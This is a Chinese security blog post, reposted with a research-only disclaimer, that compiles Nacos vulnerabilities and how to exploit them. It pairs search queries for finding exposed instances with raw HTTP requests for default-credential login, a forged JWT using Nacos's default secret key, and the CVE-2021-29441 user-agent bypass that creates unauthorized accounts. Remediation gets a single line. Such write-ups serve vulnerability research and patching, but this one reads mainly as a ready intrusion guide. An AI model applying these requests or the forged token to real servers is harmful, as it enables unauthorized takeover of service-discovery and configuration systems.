nacos漏洞整理(一)

admin
admin
admin
131485
文章
107
评论
2024年12月28日22:02:11评论7 views字数 2362阅读7分52秒阅读模式

1.nacos

    Nacos 是一个易于使用的平台,用于动态服务发现和配置管理。它是阿里巴巴开源的一个更通用的解决方案,旨在解决云原生应用中的服务发现、配置管理、服务健康检查和动态服务注册等问题。Nacos 通常用于微服务架构中,以支持服务的弹性、容错和高可用性。

2.漏洞描述

(1).默认口令

(2).nacos身份认证绕过漏洞

(3).未授权新建用户(CVE-2021-29441

3.影响版本

nacos

nacos漏洞整理(一)

4.资产测绘

title="nacos"app="nacos"

nacos漏洞整理(一)

5.漏洞复现

5.1 默认口令:nacos/nacos

POST /nacos/v1/auth/users/login HTTP/1.1Host: 192.168.6.8:8848User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 29Origin: http://192.168.6.8:8848Connection: closeReferer: http://192.168.6.8:8848/nacos/X-Forwarded-For: 10.10.10.5X-Originating-IP: 10.10.10.5Priority: u=0username=nacos&password=nacos

nacos漏洞整理(一)

5.2 nacos身份认证绕过漏洞

    nacos在默认情况下未对token.secret.key进行修改,导致攻击者可以绕过密钥认证进入后台。也就是nacos的密钥是有默认值的,其鉴权是JWT,我们知道密钥即可伪造一个恶意的JWT令牌来攻击对于jwt加密 其实就是用了base64 密钥是写死在源码里面的 所以直接可以用jwt伪造攻击对应就是数据包的accesstoken

在登录口随便输入账号密码,抓包:

POST /v1/auth/users/login HTTP/1.1Host: 192.168.6.8:8848User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 27Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Forwarded-For: 10.10.10.5X-Originating-Ip: 10.10.10.5Priority: u=0Te: trailersConnection: closeusername=test&password=test

拦截返回包,将返回包内容改为如下,再放包即可登入系统:

nacos漏洞整理(一)

POC:HTTP/1.1 200Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNAContent-Type: application/json; charset=utf-8Date: Tue, 14 Mar 2023 16:34:47 GMTContent-Length: 206{ "accessToken": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA", "tokenTtl": 18000, "globalAdmin": false, "username": "nacos"}

5.3 nacos身份认证绕过漏洞(CVE-2021-29441)

        在早期低版本的Nacos中,当配置文件使用身份验证(Dnacos.core.auth.enabled=true)时候,会判断请求ua是否为"Nacos-Server",如果是的话则不进行任何认证

复现步骤:1、访问/nacos/v1/auth/users?pageNo=1&pageSize=9验证漏洞是否存在2、将UA改为:Nacos-Server3、POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1

(1)验证漏洞:/nacos/v1/auth/users?pageNo=1&pageSize=9

nacos漏洞整理(一)

(2)创建用户:

nacos漏洞整理(一)

(3)创建完成即可登录系统

6、漏洞影响

(1).可通过上述漏洞控制系统

7、漏洞修复

(1).打补丁升级到高版本

原文始发于微信公众号(安全技术达人):nacos漏洞整理(一)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月28日22:02:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nacos漏洞整理(一)https://cn-sec.com/archives/3497446.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息